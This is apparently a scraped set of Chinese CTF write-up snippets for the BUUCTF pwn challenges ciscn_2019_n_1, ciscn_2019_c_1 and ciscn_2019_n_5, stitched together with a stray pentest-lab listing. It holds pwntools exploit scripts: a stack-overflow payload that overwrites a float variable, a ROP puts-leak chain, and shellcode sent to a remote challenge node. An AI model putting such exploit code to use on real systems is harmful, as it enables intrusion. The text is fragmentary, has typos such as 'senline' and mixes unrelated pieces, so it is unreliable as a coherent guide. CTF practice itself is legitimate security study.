BUUCTF 4.ciscn_2019_n_1 拿到题目首先先运行程序 我们发现给了我们一个数字,我们猜测应该是一个条件判断的程序,然后我们检查一下保护机制 我们发现只开了NX(不可执行)保护,那我们直接看IDA就行了。 main函数只是设定了无缓冲模式,以及调用了一个func函数,然后我们看一下 我们可以看到gets 和我们想要的flag,至此...
题目链接:ciscn_2019_n_1。 下载附件后,使用 IDA 打开程序,并进行反编译,定位到 main 函数,如下。 int __fastcall main(int argc, const char **argv, const char **envp) { setvbuf(_bss_start, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 2, 0LL); func(); return 0; } func 函数如下。 int ...
ciscn_2019_n_1 例行检查,64bit,NX保护开启 运行一下,没有信息 64位IDA打开,看到了cat flag ,跟进瞧瞧 函数显示 ,当v2等于11.28125时,得到flag,但要求 我们输入的是v1,所以我们只有把v1和v2 之间全部填满之后紧接着写入11.28125即可。 我们可以看到这两个之间的大小为0x2C 再将11.28125转换为内存中的16进制...
再查看一下func函数 本题思路就是通过gets传入一个v1的值,然后依靠传入的v1进行栈溢出,改写v2的值,使得v2的数值等于浮点数的11.28125 查看一下栈 -0000000000000030 ; D/A/* : change type (data/ascii/array) -0000000000000030 ; N : rename -0000000000000030 ; U : undefine -0000000000000030 ; Use data ...
buu ciscn_2019_n_1 1 栈溢出 预先步骤 检查文件格式(64位elf)checksec 没有任何保护chmod 777 file 开启可执行权限 IDA(64) 编写exp from pwn importp = remote("ip address",port)payload = 'A'44 + p64(0x41348000)p.senline(payload)p.interactive() ...
到96,可以溢出,最后使用pwntools的攻击脚本如下: ciscn_2019_n_1 丢进ida反汇编可以看到func函数的逻辑如下: 可以看到逻辑是输入到v1,并让v2=11.28125即可,还是栈溢出逻辑,v1到栈底30h即48,v2到栈底4,至于11.28125在ida里对应部分可以看到整型对应的数字是41348000h,所以攻击脚本如下: ciscn_2019_c_1 丢进ida...
buu ciscn_2019_n_1 1 栈溢出 预先步骤 检查文件格式(64位elf) checksec 没有任何保护 chmod 777 file 开启可执行权限 IDA(64) 找到func()函数,F5生成伪代码。 再寻找到v1,v2的相对位置,发现可以覆盖v1从而达到修改v2. 编写exp from pwn import*...
渗透测试初体验:DC-1靶场原创 Web安全 该文章为DC靶场的第一个,最为简单的靶场,练手使用发现练手过程中还是有很多不明白的点,先了解流程,后续再学习。 微笑的刺客12345 205658围观·2·202022-08-07 漏洞分析丨HEVD-11.DoubleFetch[win7x86] 漏洞
#elf = ELF('./ciscn_2019_c_1') #print(hex(elf.got['puts'])) pop_rdi_ret = 0x0000000000400c83 puts_plt = 0x00000000004006E0 main_addr = 0x0000000000400B28 puts_got = 0x0000000000602020 len = b'A' * 88 #gdb.attach(sh) sh.recvuntil(b'Input your choice!\n') ...
sendlineafter(x,y) io=remote('node3.buuoj.cn',25188) #io=process('./ciscn_2019_n_5') elf=ELF('./ciscn_2019_n_5') ra() sl(asm(shellcraft.sh())) ra() sl('a'*40+p64(0x601080)) io.interactive() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22...